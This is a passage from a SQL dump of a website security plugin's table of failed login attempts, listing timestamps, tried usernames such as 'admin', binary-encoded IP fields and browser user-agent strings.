Firefox/62.0'),(4438,7590,1629235234.027229,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���8-2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4439,7591,1629235532.883553,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Q֨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4440,7592,1629235845.303703,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��A<�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4441,7594,1629236508.915461,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4442,7595,1629236835.774589,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4443,7596,1629237114.448121,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4444,7596,1629237114.532339,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4445,7597,1629237425.828870,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���� �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4446,7597,1629237425.862488,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���� �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4447,7598,1629237774.539014,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4448,7598,1629237774.910213,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4449,7599,1629238021.356082,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"{3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4450,7600,1629238381.626585,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���NO','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4451,7601,1629238731.781115,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Q`q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4452,7602,1629238958.828751,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���D�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4453,7603,1629239286.751134,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4454,7604,1629239647.569474,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4455,7605,1629239940.699937,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ʈ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4456,7606,1629240259.022413,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����	�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4457,7607,1629240618.382862,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=C�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4458,7608,1629240894.886999,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4459,7609,1629241239.144798,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��˫�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4460,7610,1629241542.949982,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4461,7611,1629241873.821039,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���8-2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4462,7612,1629242197.115973,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�X)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4463,7614,1629242858.080192,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4464,7615,1629242972.007627,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4465,7616,1629242972.279205,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4466,7617,1629242972.725120,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4467,7618,1629242972.964483,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4468,7619,1629242973.204654,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4469,7620,1629242973.446318,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4470,7621,1629242973.771568,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4471,7622,1629242974.049914,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4472,7623,1629242974.330424,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4473,7624,1629242974.586579,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4474,7625,1629242974.840996,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4475,7626,1629242975.147580,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4476,7627,1629242975.405915,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4477,7627,1629242975.469636,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4478,7628,1629242976.516361,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4479,7628,1629242976.828639,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4480,7629,1629242977.108013,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4481,7630,1629242977.493225,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4482,7630,1629242977.524736,1,'loginFailInvalidUsername','lorraine',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4483,7632,1629243121.943868,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4484,7633,1629243471.239622,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4485,7634,1629243818.443126,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���R-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4486,7635,1629244093.947197,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Qٌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4487,7636,1629244448.546183,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4488,7637,1629244799.027771,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4489,7638,1629245130.251982,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����X�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4490,7639,1629245444.830203,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4491,7640,1629245723.145667,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D�\n9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4492,7641,1629246107.992815,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\>cc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4493,7642,1629246389.603567,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4494,7642,1629246389.755691,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4495,7643,1629246792.959453,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���˰R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4496,7644,1629247121.639999,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4497,7645,1629247451.079866,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���p�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4498,7645,1629247451.114251,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���p�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4499,7646,1629247795.376258,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�^_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4500,7647,1629248086.604538,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�D�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4501,7647,1629248086.662439,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�D�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4502,7648,1629248447.726024,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ÚW�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4503,7649,1629248810.829033,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4504,7650,1629249137.478765,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4505,7651,1629249511.249946,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4506,7652,1629249857.465791,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4507,7652,1629249857.474038,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4508,7653,1629250213.945695,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4509,7654,1629250258.942234,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�M','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),(4510,7654,1629250258.975468,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�M','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),(4511,7655,1629250524.433627,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4512,7656,1629250885.382387,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���RW�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4513,7656,1629250885.417620,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���RW�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4514,7657,1629251267.454958,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4515,7657,1629251267.463544,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4516,7658,1629251413.968702,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0'),(4517,7658,1629251414.027189,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0'),(4518,7659,1629251455.052194,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4519,7660,1629251455.334625,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4520,7661,1629251455.568179,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4521,7662,1629251455.799357,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4522,7663,1629251456.038276,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4523,7664,1629251456.332640,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4524,7665,1629251456.549621,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4525,7666,1629251456.809737,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4526,7667,1629251457.135475,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4527,7668,1629251457.350773,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4528,7669,1629251457.560203,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4529,7670,1629251457.783008,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4530,7671,1629251458.087287,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4531,7672,1629251458.296788,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4532,7673,1629251458.536291,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4533,7674,1629251458.763824,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4534,7675,1629251459.004815,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4535,7676,1629251459.250845,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4536,7677,1629251459.434494,1,'loginFailInvalidUsername','editweb',0,'\0\0\0\0\0\0\0\0\0\0��>ұ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4537,7679,1629251603.516385,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4538,7679,1629251603.569700,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4539,7680,1629251769.874497,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�;�','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),(4540,7682,1629252270.939103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4541,7683,1629252674.100281,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g|]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4542,7684,1629252989.582758,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Q֨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4543,7685,1629253417.795110,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����q~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4544,7686,1629253756.471910,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4545,7687,1629254120.990738,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4546,7688,1629254495.150050,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4547,7689,1629255489.890007,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4548,7690,1629255725.944406,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��	B�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4549,7691,1629255956.228524,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ge��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4550,7692,1629256332.247261,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4551,7693,1629256393.455764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4552,7694,1629256587.997172,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4553,7695,1629256799.207631,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4554,7696,1629257006.028217,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���, ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4555,7697,1629257206.893651,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4556,7698,1629257462.609167,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����K�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4557,7699,1629257620.278407,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4558,7700,1629257839.830343,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4559,7701,1629258027.293775,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4560,7701,1629258027.330156,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4561,7702,1629258248.951007,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 